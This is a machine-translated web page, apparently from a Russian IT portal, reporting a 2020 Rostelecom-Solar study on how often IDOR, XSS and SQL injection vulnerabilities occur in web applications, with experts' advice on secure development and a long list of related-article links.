Content |
Main article: Security on the Internet
2020
BI.Zone and Ngenix announced the beginning of technology cooperation
On June 1, 2020 Ngenix, the provider of block services for web resources, reported that together with BI.Zone, Russian the developer of solutions in the field of cyber security, signed the agreement on cooperation in the field of a research and ensuring cyber security of public web applications. Read more here.
Rostelecom-Solar: about 70% of web applications contain critical vulnerabilities
On May 18, 2020 the Rostelecom-Solar company reported that it carried out the analysis of security of the web applications belonging to the organizations of the public and banking sector, the production area, information technologies, information security and others. About 70% of the studied appendices are contained by critical vulnerabilities which allow cybercriminals to get access to confidential data of the organization and users and also on behalf of the victim to make different transactions in vulnerable online services.
According to the company, the basis of a research was formed by the data obtained by experts Rostelecom-Solar during the cyberexercises, testings for penetration and projects according to the analysis of security. In total more than 30 web applications among which – the Internet portals of the companies, the system of remote banking, CRM and others were analyzed. Results demonstrate that the critical and easily operated vulnerabilities contain practically in each web application. The most part from them is connected with lack of filtering of the arriving data on the party of the Web server and also with shortcomings at the business logic layer of applications.
Nearly 70% of web applications were subject to IDOR vulnerabilities (Insecure direct object references is unsafe direct references on objects). Exploiting them, the malefactor can find method of search the identifiers used in a system and get unauthorized access to data of users. Most often this vulnerability meets in web applications with a difficult logical structure, for example, in the systems of remote banking. Successful operation of IDOR vulnerability in this case is able to allow the malefactor to obtain, for example, information on transactions and a status of accounts of users or to change data of their profiles.
 | As our practice, logical vulnerabilities shows, for example, the class IDOR, for May, 2020 meet more often others – the reason that it is very difficult to reveal the vulnerabilities connected with logic using code scanners. But they are also one of the most critical – malefactors can get data access of other users. In a case with banking systems it can be very sensitive information. Alexander Kolesov, the head of department of the analysis of security explained Rostelecom-Solar |  |
For May, 2020 more than 50% of web applications contain shortcomings of filtering of the data arriving on the server that gives the chance to carry out attacks the XSS type (Cross-Site Scripting is cross-site accomplishment of scenarios). Such attacks, allow the malefactor to implement in the web page harmful JavaScript- the code which will be executed in browser the victims when opening the page. This code can interact with the Web server of the malefactor and transfer there, for example, cookie-files the user – with their help the malefactor can become authorized on internet- resources under credentials of the victim and to work from her name.
Another 30% of vulnerabilities are connected with a possibility of implementation of the SQL code because of absence or incorrect filtering of incoming requests from the user. At the expense of it the malefactor can receive control over the database of the organization and including access to confidential data of clients (for example, to passport details, the credit card, information on transactions, etc.) and an opportunity to change them directly on the server. In certain cases the malefactor can start accomplishment of the code of the operating system and by that to receive control over the server that will allow it to duplicate further all data in the storage. This type of vulnerability attracts the most serious risks of date leak (including personal and payment) and also financial and reputation losses.
| | These vulnerabilities exist long ago – for example, many years experts predict death to SQL injections, however even in updated applications for May, 2020 it is possible to meet this vulnerability. Protection of web applications – first of all, a task of the developer. You should not rely completely on means of protecting – in particular, Web Application Firewall cannot detect the attacks directed to vulnerabilities in logic of operation of application, for example, of IDOR. It is already necessary to observe at a stage of application creation the key principles of safe development: always to filter the data arriving from the user and to check access rights – at the level of Back-end, but not the client interface. Besides, it is necessary to carry out the analysis of security of the application periodically. Alexander Kolesov, the head of department of the analysis of security told Rostelecom-Solar | |
Read Also
- Security of the websites
- Security and problems of social networks
- Security on social networks
- Security of the software (S)
See Also
- Censorship on the Internet. World experience
- Censorship (control) on the Internet. Experience of China
- Censorship (control) on the Internet. Experience of Russia, Roskomnadzor
- Law on regulation of Runet
- VPN and privacy (anonymity, anonymizers)
- Protection of critical information infrastructure of Russia
- Law On security of critical information infrastructure of the Russian Federation
- National Biometric Platform (NBP)
- Single Biometric System (SBS) of these clients of banks
- Biometric identification (market of Russia)
- Directory of solutions and projects of biometrics
- Digital economy of Russia
- Information security of digital economy of Russia
- SORM (System for Operative Investigative Activities)
- State detection system, warnings and mitigations of consequences of the computer attacks (State system of detection, prevention and elimination of consequences of computer attacks)
- National filtering system of Internet traffic (NASFIT)
- Yastreb-M Statistics of telephone conversations
- How to bypass Internet censorship of the house and at office: 5 easy ways
- The auditor - a control system of blocking of the websites in Russia
- The Single Network of Data Transmission (SNDT) for state agencies (Russian State Network, RSNet)
- Data network of public authorities (SPDOV)
- Single network of telecommunication of the Russian Federation
- Electronic Government of the Russian Federation
- Digital economy of Russia
- Cyber crime in the world
- Requirements of a NIST
- Global index of cyber security
- Cyber wars, Cyber war of Russia and USA
- Cyber crime and cyber conflicts: Russia, FSB, National coordination center for computer incidents (NKTsKI), Information Security Center (ISC) of FSB, Management of K BSTM of the Ministry of Internal Affairs of the Russian Federation, Ministry of Internal Affairs of the Russian Federation, Ministry of Defence of the Russian Federation, National Guard of the Russian Federation
- Cyber crime and cyber conflicts: Ukraine
- Cyber crime and cyber conflicts: USA, CIA, NSA, FBI, US Cybercom, U.S. Department of Defense, NATO, Department of Homeland Security, Cybersecurity and Infrastructure Security Agency (CISA)
- Cyber crime and cyber conflicts: Europe, ENISA
- Cyber crime and cyber conflicts: Israel
- Cyber crime and cyber conflicts: Iran
- Cyber crime and cyber conflicts: China
- As the USA spied on production of chips in the USSR
- Security risks of communication in a mobile network
- Information security in banks
- Digital transformation of the Russian banks
- Overview: IT in banks 2016
- The policy of the Central Bank in the field of data protection (cyber security)
- Losses of the organizations from cyber crime
- Losses of banks from cyber crime
- Trends of development of IT in insurance (cyberinsurance)
- Cyber attacks
- Overview: Security of information systems
- Information security
- Information security (world market)
- Information security (market of Russia)
- The main trends in data protection
- Software for data protection (world market)
- Software for data protection (the market of Russia)
- Pentesting (pentesting)
- Cybersecurity - Means of enciphering
- Cryptography
- VPN - Virtual private networks
- Security incident management: problems and their solutions
- Authentication systems
- Law on personal data No. 152-FZ
- Personal data protection in the European Union and the USA
- Quotations of user data in the market of cybercriminals
- Jackpotting
- Virus racketeer (encoder)
- WannaCry (virus racketeer)
- Petya/ExPetr/GoldenEye (virus racketeer)
- Malware (malware)
- APT - Targeted or target attacks
- DDoS and DeOS
- Attacks on DNS servers
- DoS-attacks on content delivery networks, CDN Content Delivery Network
- How to be protected from DDoS attack. TADetails
- Rootkit
- Fraud Detection System (fraud, fraud, fraud detection system)
- Solutions Antifraud directory and projects
- How to select an antifraud system for bank? TADetails
- Security Information and Event Management (SIEM)
- Directory of SIEM solutions and projects
- Than a SIEM system is useful and how to implement it?
- For what the SIEM system is necessary and as it to implement TADetails
- Intrusion detection and prevention systems
- Reflections of local threats (HIPS)
- Confidential information protection from internal threats (IPC)
- Phishing, DMARC, SMTP
- Trojan
- Botha's botnet
- Backdoor
- Worms Stuxnet Regin
- Flood
- Information loss preventions (DLP)
- Skimming (shimming)
- Spam
- Sound attacks
- Antispam software solutions
- Classical file infectors
- Antiviruses
- Cybersecurity: means of protecting
- Backup system
- Backup system (technologies)
- Backup system (security)
- Firewalls
| The site content is translated by machine translation software powered by PROMT. The machine-translated articles are not always perfect and may contain errors in vocabulary, syntax or grammar. Read original article If you find inaccuracies or errors in the results of machine translation, please write to editor@tadviser.ru. We will make every effort to correct them as soon as possible. |